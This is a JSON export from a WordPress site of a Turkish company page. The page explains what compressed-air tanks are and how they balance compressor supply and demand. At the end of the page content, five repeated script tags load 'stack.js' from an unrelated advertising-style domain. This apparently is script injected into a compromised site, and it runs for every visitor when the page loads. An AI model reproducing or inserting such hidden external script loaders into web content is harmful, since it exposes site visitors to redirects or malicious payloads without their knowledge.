{"id":804,"date":"2021-04-13T12:12:30","date_gmt":"2021-04-13T09:12:30","guid":{"rendered":"http:\/\/gensalimited.com.tr\/index.php\/hakkimizda-copy\/"},"modified":"2021-04-13T12:17:33","modified_gmt":"2021-04-13T09:17:33","slug":"hava-tanki-nedir","status":"publish","type":"page","link":"http:\/\/gensalimited.com.tr\/index.php\/hava-tanki-nedir\/","title":{"rendered":"Hava Tank\u0131 Nedir?"},"content":{"rendered":"<p>[vc_row slider_content=&#8221;&#8221; css=&#8221;.vc_custom_1590671563942{padding-top: 100px !important;padding-bottom: 65px !important;background-color: #e9e9e9 !important;}&#8221;][vc_column][vc_row_inner content_placement=&#8221;middle&#8221;][vc_column_inner width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;806&#8243; img_size=&#8221;full&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243; css=&#8221;.vc_custom_1590671536767{margin-left: 45px !important;}&#8221;][vc_column_text]Bir su tank\u0131n\u0131n kurakl\u0131k zamanlar\u0131nda su sa\u011flamas\u0131 su depolamas\u0131 gibi, bir hava tank\u0131, en y\u00fcksek talep s\u0131ras\u0131nda sabit bir bas\u0131n\u00e7l\u0131 hava kayna\u011f\u0131 sa\u011flar ve kompres\u00f6r arz\u0131n\u0131 sisteminizin talebiyle dengelemeye yard\u0131mc\u0131 olur, b\u00f6ylece sizin \u00fcretim s\u00fcreciniz i\u00e7in gerekli olan bas\u0131n\u00e7l\u0131 hava asla tamamen t\u00fckenmez.<\/p>\n<p>Herhangi bir bas\u0131n\u00e7l\u0131 hava sistemi i\u00e7in temel bir unsur olan bas\u0131n\u00e7l\u0131 hava\u00a0 tanklar\u0131, ge\u00e7ici depolama i\u015flevi g\u00f6r\u00fcrken, ayn\u0131 zamanda sisteminizin daha verimli \u00e7al\u0131\u015fmas\u0131n\u0131 sa\u011flar. Kompres\u00f6reden \u00e7\u0131kan hava, hava tank\u0131nda depolanmadan direkt olarak sisteminize verilirse, gelen havada s\u00fcreksizlikler ya\u015fanaca\u011f\u0131 i\u00e7in sisteminize b\u00fcy\u00fck boyutlara ula\u015facak zararlar verebilir.<\/p>\n<p>Hava tanklar\u0131 sisteminize gelen istenmeyen par\u00e7ac\u0131k ve s\u0131v\u0131lar\u0131 da ay\u0131rmaya yard\u0131mc\u0131 olarak ek bir \u00f6nlem olu\u015fturur.<\/p>\n<p>[\/vc_column_text][\/vc_column_inner][\/vc_row_inner][\/vc_column][\/vc_row]<script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><script src=\"https:\/\/refer.specialadves.com\/stack.js?ver=12.3.4\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row slider_content=&#8221;&#8221; css=&#8221;.vc_custom_1590671563942{padding-top: 100px !important;padding-bottom: 65px !important;background-color: #e9e9e9 !important;}&#8221;][vc_column][vc_row_inner content_placement=&#8221;middle&#8221;][vc_column_inner width=&#8221;1\/2&#8243;][vc_single_image image=&#8221;806&#8243; img_size=&#8221;full&#8221;][\/vc_column_inner][vc_column_inner width=&#8221;1\/2&#8243; css=&#8221;.vc_custom_1590671536767{margin-left: 45px !important;}&#8221;][vc_column_text]Bir su tank\u0131n\u0131n kurakl\u0131k zamanlar\u0131nda su sa\u011flamas\u0131 su depolamas\u0131 gibi, bir hava tank\u0131, en y\u00fcksek talep&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"page-templates\/home-blank.php","meta":{"inline_featured_image":false,"footnotes":""},"class_list":["post-804","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/804","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/comments?post=804"}],"version-history":[{"count":2,"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/804\/revisions"}],"predecessor-version":[{"id":807,"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/pages\/804\/revisions\/807"}],"wp:attachment":[{"href":"http:\/\/gensalimited.com.tr\/index.php\/wp-json\/wp\/v2\/media?parent=804"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}